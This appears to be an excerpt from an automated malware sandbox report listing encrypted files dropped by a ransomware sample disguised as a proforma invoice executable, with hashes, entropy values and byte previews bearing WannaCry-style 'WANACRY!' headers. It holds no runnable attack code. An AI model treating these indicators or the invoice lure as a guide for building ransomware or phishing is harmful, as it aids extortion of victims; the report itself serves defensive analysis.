                                                          Preview:B.o.[-7'^...n..wg.[..W.3.8.w..Q.f.it"..,..b3....ncm.t..F..E{H....Of!..Y.......G..MZ_..+^.c....j{.....Y..Ki..17.".py..AR..T...f./..9........=......d~r..z..0.s...p..FT...~.....<....rK...m.......}...[...W.U..^.$%...a.f.....PZ.|".`..l.....?E.J1.4.f~x.%..x...iu.*.....q.Wl.._...7.z...D|;..E.G..n...!.F......>.d#..}gdl.3.H.z........:.oz.....2....d.\..LU.I..`H......&.L>....u.}..c....g.P.H.$.0^5.I...x.....p,< x.F/..p......_G...C.Eg...MMR..t^f.G@.'............96w.>..<w@t...N.S1.J.$[X2.}k.-.au..b......v>....P;y....Eh..-m\O ...........,..k`SR2.T6.r....]...4...:.5..sEu..|2...k#..Un.!....\..'..V.A.I.i.~.......C!t.@..R......"Y......^.R..k.f?.?..5...l...X.....g5$.]...+.D.........).Rs....D2..,M`..I..A..%.....oF..5R.x.k.z...C...;.BZX..0..R.......3,5r...y.i.....U.U........G.W...k.kp....>.+(.....PR..uF1z..3..~.7ES.....Uc.h.C=.a"K..$.72....-.i.......Xxs...1B...2.~4...Y..b@]...c.f..."..(J..- ..h..Po.+\*...l......$.Y..:...+..v..{.x.@...+....._..&."..~..z..T...

                                                          C:\Users\user\AppData\Local\Temp\47.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.8163487633396285
                                                          Encrypted:false
                                                          SSDEEP:24:sfwySVOetAJ6NIHyV5X4nMp0W1vjZhd7Cqh0RK:sfHSYMvmyV59p0WFZ/MK
                                                          MD5:D0242B3519D7DEBF6D774431BE4B6554
                                                          SHA1:EA80BA05A7EC017AFE5C2DD8947C36250D7373E0
                                                          SHA-256:10374A847DEC3BE5C5F190629FE552F8AD647F602AAA081E5D91FC182631BDE4
                                                          SHA-512:3587F6CAE516C5558D70E2D3D0975131B052446E2DA42E128E9CF242DF2649321621BF7E6FBB077F76AC5E78D91CC3035955F3AC2423EE52BF854081359F8FF5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......UIHH.Ue...,..........*5P....R.D.F87~&l...R.q.o......f...#......`(.....a:..}.......7{...i...KDy........y.~.]./.qx.\.f..J..<......#.D3K..|.u...6L......i={r(l..:G......#....P...o..-.#B..*.M{......^.."_.E...A.....u.B.].@..........rqW.H.c.....~..z.;.D..@..w......`..c..dZ+..5......:c.1..Q... u.j{..Sl..E.8_.6..t.8...l.D.....$......dJ0.m`.3.n:.X.....8.,...u....Y.u.....]m.. ).8.....S..6..>..T...R....7.(.....O.C....9..v..;..C...4...g.r7.V...m.0..H*.......8...(..{..>..=.....{...1..I3R.f.<:fc.~..2<s..u......N.0...n.T.TW..#.m..{.2..V..bMO+Lc.A.:....&....6.m83.YH.....F..t\;}[...)..;.w..2)...V..d.m...b.~*A..|.1=.,UE...m...NY|..x..x!q..<....|.zS..}D..j..d.Iv...Tq.1.@|6l.s.c}...S.$.89..bu....k\;.w.b...'.>\....Pyz.]..6...!..u.d....tJ]...bM..p.{;Xi.;X.p.....(...vht]....Jo.`....A......s.KNm5..tI....$...&......2....$....K'...I0_!IJ.XEi.....}.....d...h....+...b`...q.2..iA._y*,.T.........B~c...k.......>.c$R[.n2Y......D.w...f...e.MMy...$...;.:_:h...gw...2.

                                                          C:\Users\user\AppData\Local\Temp\48.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7993485033063426
                                                          Encrypted:false
                                                          SSDEEP:24:iuOt/cNfdPcecHrIK5b6XFh0dVPVVNYyY/OUDkU:fM/cN1UecLIqb6XFWHP+yY/OUQU
                                                          MD5:608203364342812ED5FAED87A7F3B3C8
                                                          SHA1:EC2CDC4FEE3895B88E46E1B87EE0712FBF7604E6
                                                          SHA-256:5BAD441A5E3AE85FD3435CC095CD40C55D856BFB0FF7A572151F0BC3F200592A
                                                          SHA-512:068BBF9C2287550954C49F46222DB307FEC2912F3F1B61C3836D8EC1953CD7E62B7885C262D48BF398E48413C7198C8C1D0C504155F2AB26FA88EBEAFAD83D36
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..Jd!..U..e..*.....@!.C.. Y'.?b..p...5.W.Mf.a....{.......J..BS.$,X..w.k..<C...w...F.Svx...2Ms)6.]%.P..bi6k{/1..4..P0.......<..q.X1.-..qJ}Fw..5.....YL=tk Cmm8=S..7......]`.<.A.#..A.e......ay.5...$3...<p....S7a.+......./t.|.BQ.j......Bb.;.W.zx....H.=.L ....FMh.^3c6EW.*>u!..ZR.S..?.`..].:N...G.R@..e.q..-..9G_<.9.......Ka..j5..M.u....5..]d5.. ...,...nd..z.....rW.,G8=...[`u...".....8.}...8....:..(.W%.a.c....EZ....*w......6..R.RnZ.I.....#..}...w..........Q....b0.&.h...1.-..D.......O......f....$....U..=)f@...6pVU.}....@.o.{.v.s........A..i_3:..d_....1].q..U.wK.......2@..[......:Bfli..........q.<...#}..3_.3..j..'.....)..D.*.....z.M..%..u.Epl.......s..XL..k..A!"..>.......4J..... ,/,,....).*%...M.Q....4..e..w..._Axj..Te..fkOY.....B0..fLm.....".^..0w..zb.........%...e'(..O"v..{.X..V=..)f@./MV.....QI..!..&&....(L}k..D.=.?}l........<....kY.)SS....K.4..v.-..i.e.....#.^k....a..G..s.q..m...:..fyc....k(.|y&......^..U.].~.V....R_WI...,..*....w.74..+

                                                          C:\Users\user\AppData\Local\Temp\49.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817610163643991
                                                          Encrypted:false
                                                          SSDEEP:24:ScFgx3uPkuakUndwpAzK9GqlSkKx0o/NUDI94sezvf:3FIe8pdJu9VWNkIvg3
                                                          MD5:F5F81660FE1310BD8C724E6E20EBF545
                                                          SHA1:8B01AFD147AA7C1F63C8777FAC0EC5E2541EDD3F
                                                          SHA-256:3794B37F75980A2B3D98221F96822604EACBC6054DEF7D407F0C155EB234B455
                                                          SHA-512:C6F7D2BE60D4FE8BEB93B50F75AC4485A337CB6F4E01619318D2376AB36EFEDB532E26180ECC77FD29D991C9DAC20EAD4DC44D009CFD4D2FEE446DB5C8C0B5E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:P.K..|.m.W.o....iX!...3..6.0E...s1.?.{C..=.m.....X.l.3.o=L.....0....u<[a....g.....r..........f.^...5\. )[.G).q.....7..'...P.lJ..`..../.EM....G<t.Z.$..3P.#|.t.._<.v...|...Yk..1L_.;...8.8.(.u......z.-....0 .p.p.6....8/...8....c...z!.A^.;<j......,........i-..0..$DP}.k.|......Z.B.A..dD....j@..x@...y*N........k.x..H../..V:.o.k..]....Xp.......B..5|.(q....RT!..W...K..@......B..z._..c|.cM-......Y5.g..d.W....W."Gp;..r.......|.......d.^".[..Y.S..o....A*^........."....u.;x.T.........c.Z.....".9.H...H.3.o2....^a3...q..v...i.%.4..z5.M.X._.D.K.M...%G.|a.h.)..n......K......NNvG<.4!..........3M...,Fd...cS9....._.....C4aMj.5.Uf.O.sO.F<..S..}.....V..+r..........V.{.[h..[t..:&.>.....&K.e6.UQ0.GL/.a..V...\.k...Q........n...*...1&.Y..r.a}k}C../J......VN.Dm.<.6.........9.3...?..Z...+V.a.....m/..S?.F........f)X.\.[h..%Z.a..l...V....i.~w.h....I...........8.$?.+...QGITs...0..8f..@..u........"."W:...;<pc.Jb..h.7...o.S.M.bD.go91.'..cX.....c..us....f

                                                          C:\Users\user\AppData\Local\Temp\5.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.823621733972832
                                                          Encrypted:false
                                                          SSDEEP:24:ePo4IvUVkN55OzXPS2IoB1KhXc+JUIz8YHLTHzGxCFTzYtkSmci:eQdsECzlIoyLUIz8YfHycFfCC
                                                          MD5:10639254F86E54A742C5D70140269FAA
                                                          SHA1:FA2E48766E43250DCC8D030FE9E2D7424087A759
                                                          SHA-256:AE79E37584FF86A9D1A01F70D76B03A897FB38D57F911757A4BF16C4883D5542
                                                          SHA-512:F08863AEA3A548EF42150ECCB9096CA6E4FFCB143F0BDAA5B410F9E5309F2E5E1ECF29D6195B7142BA990515D0CF8C230D68C59A8350033B2472B9D8607669B7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..5...tS.O.>nV7K.Q.Ip.X)K[|..e....m.-W......2....n5{i~~P.~..Og...D..8G.j.2.j..>Q./...q..u.*.jz....z.FC+.y..#.../n.....g.(.d..K...O..v...."p.U.F.`..J_y'.e".\&.1..6.{?..gj.. ....@.FnE....2....C..Q...].u....Y..:.bW..j...#...t;!.7....+.3f..m ..c...0..N.a."....i.5..(.efL...}.....Rt..Yn.M.(...L.......i.......5..C.! .rAU.5...a..CxH7.9.I..Q.....go.....2.La+v.....y..h..d.... DvH.EH.hi.. [M......@..m...#....N.3....r@.1.G.x../.4.(.:...%....p,...!.c..I........d,:y:7i..kx..=...p..5.\.UA.)-Sg+;~.."..g.T.R.t.M....3........A....?.E..G...$.]..(....]@N...?...!C....Km.O./..l.P....;n...{.K....6...j-cn*..%v......k.....^..s.....d.P.1.nS....>;.n.....%...........,.d.....@....O..wA...>.s.u..#>S:...G...../Y..%j.-...".)BM.2..i......1.l..i...*O..l9.A3.a......"....tL+.Ky:....*...c..W ft.w.+.....h?.H.g...'....$....as..mC[.<5...,..7.;7..U.|...`.X.....K.^.\.....R.......l.*8....Mv..2..A...(w.&[..L..... 3......{.\\..}d.*.SP...V.r$..N&.}.ru..J..N.4..)....T....,B.....BL.'.+

                                                          C:\Users\user\AppData\Local\Temp\50.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.835256169210775
                                                          Encrypted:false
                                                          SSDEEP:24:wQtDzA+/3XXb5MEJpl/ULpFpqvWnLhFzOowu1iJwnbtTTUXVTRT:btDzR/3bDhUfhIkEwnGVTRT
                                                          MD5:ED11E13DDEC4CB23F44CE3A765606D70
                                                          SHA1:0A4837C6E9FFFC0D2AF9A54195F096BD60621D11
                                                          SHA-256:B5467290B6D406BA071F0933BEA85A236DFA1CC1634CCF7778BD3041CA2412F5
                                                          SHA-512:244AB579FFE769E7ACC12B8B799217F7C6AE9B1298F471E7B9DAE0391110B41B84269B42CCD7FA81BA08DDCBA9B43CFAB0BBFF3753E39A1F9F5F86A265F1FF4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.G..e..?.8......+Ugv.M..u.E."..@....?8...s.......`..t.......OC.n.OC..O..d.75......Q..H...W...*.......=...7$...1.gi.L....C.........r.....v.(..B.+-.\.~^U..Z..V.....D...j<..m...5..vM.Z....\...Y ....U.......`L....=.T+..c..\.%.D!nY.JeC.jcb..x.)u.Q9.^^u.2BzKU..f.9./A...]v....RK....."+b9.s..F.....y@C.............)S.;T.G..\t..i....nf.._.l..@....S.n..7O.U.0...o.rt..5.[.R....6f``y......_........-..u..(..........n.S....~...N..x.-...^.h...9\....y..{.D.X....d..0]}..M...h..._...~6..........>.<w.._lo...e.C{.<....I/..I6...lj..@.B......r......X$*./q......0.B.......X3S...bX>..f..A.Y-n...S|:......i(k o...'...h....A*DW...Mp)...w.>I?.d....6...wV.Ec.....w..D...yI......Bu..v............0...ht...}..'T&Y....b......].....H....~.....Z..Q1.....'/..^)jH....;..a~...e.I..`.e...*/.E.!f....1_.c......5BW.C..3.h2....d.....]x.8...:.qo;R&....?p.z.]...>k|5..g..u+.}b=].o.].JsFu.............t........O..)......$....)..O..-..6~6".p..g. #1............s..T.N.d.Req....3...

                                                          C:\Users\user\AppData\Local\Temp\6.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781903416547841
                                                          Encrypted:false
                                                          SSDEEP:24:NJwF4RCj5CFxuZH/0DKgOIyN6QPjkjxq+hUka/BZ3wg4H5:s6aCFEx/0DKkydkjxJG5igO
                                                          MD5:138921DC4C06A0C0D51DE9C1E2D18DDD
                                                          SHA1:58F0ACCE36B48CB588BD58F8D8D6CEC44E44AA43
                                                          SHA-256:729533A90737FF489AA8202EF7261C09FA508976E8AFE50C664710B60401EDAC
                                                          SHA-512:D064454BFC605C39D78C1AD784EB4EE28C4399FF3B5443C7B4E571FC329ADAC87C350B09BB6D88311245E8735326651A6E71BA47D3A688D1B12976340012A4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:".<]_...(..*...U#..Z,.rqq.M.$.{....E.....m...>..4...b5j..Iz...*Nj.#~M....>U.(...7...+..7...}.}E.,.......|.IL.........E'..%..y>r...=..7.P.mQ.5...i.....e...PQR ... .;...k=.p....&....kf...#...7.0-.n!..gA...._.Y...rg......:....+...=j.....$.......F_,.....[......x.K....HC......Hw.qj.P{.{..bLH.m.../.O.rM.....sh..O.{..:..."m...r.03..).n..o..,..U..Q.F%..o.F..Q.V".]g..b..V...&A`..ri.k..."&...l.?.U...C....,.A..Z...C..#.....(...,...c.<)...20......r..j.v.c.E.h.T.....5..e...p.s,XT.w.O<.43.0.u....s..R..3.T.....u..R..g/_Gq..E.HNAUVH.D.Y..r.g...D..I....T1...]..4j..EA...:.....\t5..`..Z]..;6!I40.+lg.)..h.Q/.K.......!...X.o7p..wb...L:XCH.....mxg..U...(.7b.4....t.l...W\6R..._...y.(.?.V....>.eDCV....W..b....~...)yH.C..I@o..HL.I......{u.._.5..'!$M..e..|.E.~...?{.Ix+Q.".$n....)...L.t.4g >..L*$}..w...c.O...o].!....>.vW...p..3..%..\1w....T.R.6.....?..h%*......%.~ag....*.>.w.......n..w....R2.y.).{j.g..kv...j.V....n4^7.b..b..$..f...hP.^...8...C=....1.D.$...:S...J]7.)...,x

                                                          C:\Users\user\AppData\Local\Temp\7.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.822260955936933
                                                          Encrypted:false
                                                          SSDEEP:24:HPGS449pt+NJyiboBS25pudmcNi4iXiokyDHcvfxh3Yxxv:v5Npt+2iboBS4Emcn9vfxhYx9
                                                          MD5:70FA554C53C2C424249803CB46D85B9B
                                                          SHA1:823E10932676820CBB1BE60ABCC49697DF810618
                                                          SHA-256:B9859F7E32BA78D82CA907ED5A2AA6AFB6E051D52E85FEBCF8561C8C091DA7DB
                                                          SHA-512:79CDBA0D506328AD62DE24231D4B035C73ADDEFDB1ED938FF7C1857B62738F42185565B1260E89C5755BB6F8ED674267BCC7562BD9157F8F1A09730CCA97A663
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.k.z....Y......'MW.l*.....n?....H.)..F.IR.]..A......... .\..nn..^..QA+.vL..wl..\H....L.;.c.|..<........gecm....tZ9.M...y....;.=m{....e./.9.y...g......c.!...hk.!......vbu...Ro.o...O..N.e.'K......f.....E..*.jnh.].R.V..Z.....@...........k/...p....".zt...r...a.>,.....C....Aso .2..o.Ta....l1%.........H..(Wq..^.f..8.).....2...U..ULS..q_x..9...{.8.....D...8.9.^r~<^.....s....*.G..8fu@P...;..i.....>q.......&y\B{b...X1p....:....!.1D(.".p....d........u..`?....".0v....P5.ZC!..w...5@V..|&.=.).G\Dn.w..M.83...F|...jL.n.>..z....Z5.@=x..-.......U..~.......B..Z...e].J.L.?juo..S.|.CNz...6..t<.o.....1........z.M:g.z...+.._.....L........v.@..."....y#.....>...$.....v]....8Y....w..<........fB.L.u2.C...,....y....Q.C.U$....C.s....d....%...$9...H..T.E.A.u......J.-......F&..eY.D[.....;K..a,PC,..A...W.k(R.!]]8.H...S,........m.li..uv...; c{..g......'qe.3/C&Jit.....-.vK..D`..h.?....2Jo.B.7z.P..8.......TIZ.U...lH...G....*..O.$..*.30+.....s..}....r...A.<.Z.........%9.-.V.'.#

                                                          C:\Users\user\AppData\Local\Temp\8.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819830313222283
                                                          Encrypted:false
                                                          SSDEEP:24:hXrzChXy1JEa87SM3c3/MYTKXU5ND76NS3l9V+otGTA:ZzkyzEa8NA/MYT4UTDumlyNA
                                                          MD5:4C5F0273FCF4974C14CAA192D7A67DAB
                                                          SHA1:4DF71BE2A19322B1C89F83F96E99164BCC66B1F6
                                                          SHA-256:235DDAB663344AA6AB024E9BADB1F5C23FB1562CE68AFF0040BE8A59813AEE4A
                                                          SHA-512:3A74E06CB4CA1EA8FE08ECDCCB4FF64983993FD8C41288E15A73CC04136E74224443FC113035A6F6F73FAB1FA7C1B225CF40B2800495FB9A35E7F108A9230F62
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:?.@..}....Q`U.A....3Ak3.9...N.....}".".?(Y{.I..H..../1E.Dp.{.%.....K...\....>.L...j.S>9unD0........F.......Q._7.ms,.:.[.:l.....0.......N.D......h1..>..`..Z.5..L.].~.J.z&.v....R..H. g........G.P.D.e5.l....T......m..v.......=.z`=.B..P....`...]...s5.0.;M..ye.x.&.o6.y...l6`......J....m.....osT..s.......k...=..y...h`K..R$!{L.T}9.k#/c.....'.1LS...#.....$.<..b...;..6......$.................^UQ....:..._-..}D.W$........?.:Ir|vh......!.e...KW.....Ks.............9.%..>.a.%6]..Q.Jj0....H0_.....^.8...1'~..^.`Z.sj..B.....7c..O....1.J..V...L.....,....(.Dr.|..A..;.......LA....S.h....c.:...8.a.s..)......N..I:..8....f....c......^..OV.....4%c].!j........M.6.QR....Vf0....s..F....g.V.O...<..l.k.g5F,.`..|.g.7&.F._..8..4....IQ.8....S.r.....DaIj...I.2...1.....Iy.......<.....#..Z.,Z..f.....R/.-v'\....2..q..uQ..ZQ..N..+.f.'.;... C..c=...K.3...ik.}.DE..|81D..,.6A......GX....c...0..|G.x.E..+.{.h.;j.P.....Y.%..D..Gy...~.#..o)..."..B..m&...q^4.....Ht..4..^.

                                                          C:\Users\user\AppData\Local\Temp\9.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.80993583322359
                                                          Encrypted:false
                                                          SSDEEP:24:L++YW151wAaAbUd1XAXJmaKTDljSjzVo1H9vUgwTJcvuUGTdL:L+glwBaCsJcljRdBwTivuUGB
                                                          MD5:3D4CD4E842FC9F0B9C985F9DD1701FE4
                                                          SHA1:0631435AA989C2CA129261458CEB739098A1B4C0
                                                          SHA-256:ED8BF86F6F545E1DC0DBAA3D34C23395AAB8F02A83221FFAE0B5AD8D06D8AA40
                                                          SHA-512:60DB3B619EC5560F37F74EECCAFC54EE0E6A1B2BD0729409E5C375A5A7B53EF1A258BA1D59BE471133FEA40A9D11A079F612520173FD9B9F42DE06A47C84D59B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.......9+l9.eXk..:&..w]....Y.h.>'Y~.......H..(VI..p%..`4...../.1'.@...GpY ,.+Q%;6@.8.G..aad..(.6.K.$....d..9...F=p.r..........,.......T*< .+.jH......~..+.:.....'AX......a....f.;....0.sJ..l..Zp.!Z..>+........|..l......:.+...z.....Z....V.z......%.pR..u.e.Mt$*No..C..0"...n...{5G.B...$._ /.]`.>...z....$.T.......V......PN+....3......Y....[.......m..C.jq..H...T..n.S.7Q...g....m...W..Q.x...G...*U.LG......`5..<.P.EC}....0....fA.K....L......yL.;.d."p\.w.A.G.S.....^.$.._}..S..Ev../.m..n.k.apMyG.I..z...UV..|!.!..N.....j..W..A@.tpw...Y..... ...6...e.P.0.vB.Xa.(.nI.Y..e5..<s...e.?.r...f.e/a*O.H|.....9Bq..F..........d..ni..hg..1U..G....Z=.......e*.0D.\I..C.............$J.......?'N..............\V.v.mBPM9vk"...Rkk%.j?q.5:..O.HQ.B.R......@..'.)|.n....o...v..D..g...13g.QKN".o.Ym..|.8.^..S.zwO.``...G6.m4.."q........2@..x....y.3.......5....AB..2..?".rO..|..R..O.@?..[..~..Lp..T<...$>..]YO-..h.(.'..W..U8.&.9..{C.]#T..TY;.Z...Mf...2........0.R..$..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826491100142259
                                                          Encrypted:false
                                                          SSDEEP:24:bk2USeWIh0idje3e5Dmsgl4AQH+SDKJHHpy6vGVihWWda2+aRnpoBmtvQSWY1Ra:bkFGIh0M6A6sq4/J6AEMmdCanpouQSW/
                                                          MD5:B11A35A00767CCC90AFC26CD656BE6A5
                                                          SHA1:3B0D540C77D1A7F27F31E331ED89B08A0FE05E2D
                                                          SHA-256:057D953C72C564BD3A6B221D1C19B3489FD5C5A4A5E834FA8117DD9742A79021
                                                          SHA-512:3FAEFE7E5E5CF58C1F4EEFE2DEE21192BF04C791F0289693FF5C9BA497CC02319156D0E79FAC090F4352D5921EF84CC89EF1C9FD37396165B4FF447778524A95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....F..FKx.x.#u..#,z..........\.|DMi...1.sA."E..Z.]i..,...>......cC.@...d.6.N.f.L.....1.`...b...il=f.R.b...S.v96.'.b..ya..ENX...Q+..k.....Z..............fB..R....P...fu.9S.u.7.../..Rb..D&......;I.c......Go.......Jts..S....U.].f......+1.1..F...............!.F"....q.NPU.O...f#:.........R....,K.l..1"}).;.L_...~...I......A:r[\.}Z......c.y.QsD...L.W4C...j\O..d.j.3....h~.E.^..[;m.S.....Z\zK...W...,.(X.4s.*!..e.....K.I)..<....-..W.>.tScBl...]Me`....%....2k3.b.QE]J.SsI...}..b...8:"......u.....h*}.?_...}.2.A..t.T.v]l5Z=...w.y[.A.F...$r6H..\.&.="..@.Spl...2...D..N3......x..8..Dl.Yx....>:.eo..g...*l.D.>.N>D.n.7o...Py1wJ...._.|.q..Y..t.H...\..J..3~...Q...J.._...?;L.n.q.B.....A0n...h...L...Ix......C..K...'P..Z..!.6..[..x+..-W......S....N#..Si...kKFZ.T.."..q..3|._......G...B.:.....[.nV....8#...d.6A.].}...7.8&...l... .ho!...?...X.>.N.4j.KU.ay..R.w..]....F..J.U)}.@U&........6-....y.mMw~.7.R...ZB7)t......O...3.-:...~.~....^....br>.FT14h!?.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.826491100142259
                                                          Encrypted:false
                                                          SSDEEP:24:bk2USeWIh0idje3e5Dmsgl4AQH+SDKJHHpy6vGVihWWda2+aRnpoBmtvQSWY1Ra:bkFGIh0M6A6sq4/J6AEMmdCanpouQSW/
                                                          MD5:B11A35A00767CCC90AFC26CD656BE6A5
                                                          SHA1:3B0D540C77D1A7F27F31E331ED89B08A0FE05E2D
                                                          SHA-256:057D953C72C564BD3A6B221D1C19B3489FD5C5A4A5E834FA8117DD9742A79021
                                                          SHA-512:3FAEFE7E5E5CF58C1F4EEFE2DEE21192BF04C791F0289693FF5C9BA497CC02319156D0E79FAC090F4352D5921EF84CC89EF1C9FD37396165B4FF447778524A95
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....F..FKx.x.#u..#,z..........\.|DMi...1.sA."E..Z.]i..,...>......cC.@...d.6.N.f.L.....1.`...b...il=f.R.b...S.v96.'.b..ya..ENX...Q+..k.....Z..............fB..R....P...fu.9S.u.7.../..Rb..D&......;I.c......Go.......Jts..S....U.].f......+1.1..F...............!.F"....q.NPU.O...f#:.........R....,K.l..1"}).;.L_...~...I......A:r[\.}Z......c.y.QsD...L.W4C...j\O..d.j.3....h~.E.^..[;m.S.....Z\zK...W...,.(X.4s.*!..e.....K.I)..<....-..W.>.tScBl...]Me`....%....2k3.b.QE]J.SsI...}..b...8:"......u.....h*}.?_...}.2.A..t.T.v]l5Z=...w.y[.A.F...$r6H..\.&.="..@.Spl...2...D..N3......x..8..Dl.Yx....>:.eo..g...*l.D.>.N>D.n.7o...Py1wJ...._.|.q..Y..t.H...\..J..3~...Q...J.._...?;L.n.q.B.....A0n...h...L...Ix......C..K...'P..Z..!.6..[..x+..-W......S....N#..Si...kKFZ.T.."..q..3|._......G...B.:.....[.nV....8#...d.6A.].}...7.8&...l... .ho!...?...X.>.N.4j.KU.ay..R.w..]....F..J.U)}.@U&........6-....y.mMw~.7.R...ZB7)t......O...3.-:...~.~....^....br>.FT14h!?.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84219440613889
                                                          Encrypted:false
                                                          SSDEEP:24:bkytDUrjC1RKa9dA9c3cCYg9inm1uLKP7KHc19c/WemiSwBAqSYD6jJkFMvAoug:bkyxoKdAyMCYg9im1V2h/WeegALYDpFw
                                                          MD5:2D13F311A049E0BAF38BF3D27F79CF46
                                                          SHA1:94B59990AF2E14FB38F4B31196F0463DD19B25FE
                                                          SHA-256:7D5BDB6CC0FD5E147A7DBA8A2569FCFCADD1A123B0895C7239A27F0A394BDD32
                                                          SHA-512:DE76B31AE2C55043DF9D9D2359E2A384504232EB6D7509B25B50EF5A158821E4BC98E127B0510C581B6F89EA41C4C6F12C08492492800F8D78BB296B193C02BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........l.".?.............9..2P.....jE=(....s....a.}p.......Z.u"q..J..><...n..;....].tD0..kb......fp....O...0....w36.J..\.... ..*..4..u..k)...X.....ko.....V...1.CQc}.f...v..<..V.....K.c3q.:.~e.c.p..._h.._;.P.g...B~/..q...o..B..<...`. Q...W................. ..".....S.dT*.y9..t...Ep..HM.....R..u..#..pd.-o.Y....`......x.Bk.+..O..E.r;...X.".xr...C.v.....0..7..........r..j........*6......A]3.1...:.......s.i.....Q.wz...-9U..O..h*..n.!E..I...k.%..l..r.|&r._.b...|G.....WY.|....x.9v...Q...9.-.#RB{B.^S...;..9..klK=....'.S..e.}..+R#.Lrz(.R`.h...++.l.vh...,.....I..3..O...b.Q..5..!!.......s..Aj....%..*.W.^1;.%%T..2.....e......6.Nf....N*..]...,4?.."..<.^......U.64/.......5?...;....wj...........JO.g..G.B...l5[+.../ ...4.A.?..o..M.p.v..v..O8w;....{.N.Hk.6.T..RQ....cL.H.~......B......k...+..u..$.w.............r....4.......o...e.rT....q..!.....{.o1T^.NS..N#.P...R1.."..|...z+.z-..#.D..,e..e.]6.P.)Lk'.....R..R....^.f........2jQ.y.mV......L|....pL`

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.84219440613889
                                                          Encrypted:false
                                                          SSDEEP:24:bkytDUrjC1RKa9dA9c3cCYg9inm1uLKP7KHc19c/WemiSwBAqSYD6jJkFMvAoug:bkyxoKdAyMCYg9im1V2h/WeegALYDpFw
                                                          MD5:2D13F311A049E0BAF38BF3D27F79CF46
                                                          SHA1:94B59990AF2E14FB38F4B31196F0463DD19B25FE
                                                          SHA-256:7D5BDB6CC0FD5E147A7DBA8A2569FCFCADD1A123B0895C7239A27F0A394BDD32
                                                          SHA-512:DE76B31AE2C55043DF9D9D2359E2A384504232EB6D7509B25B50EF5A158821E4BC98E127B0510C581B6F89EA41C4C6F12C08492492800F8D78BB296B193C02BB
                                                          Malicious:false
                                                          Reputation:unknown
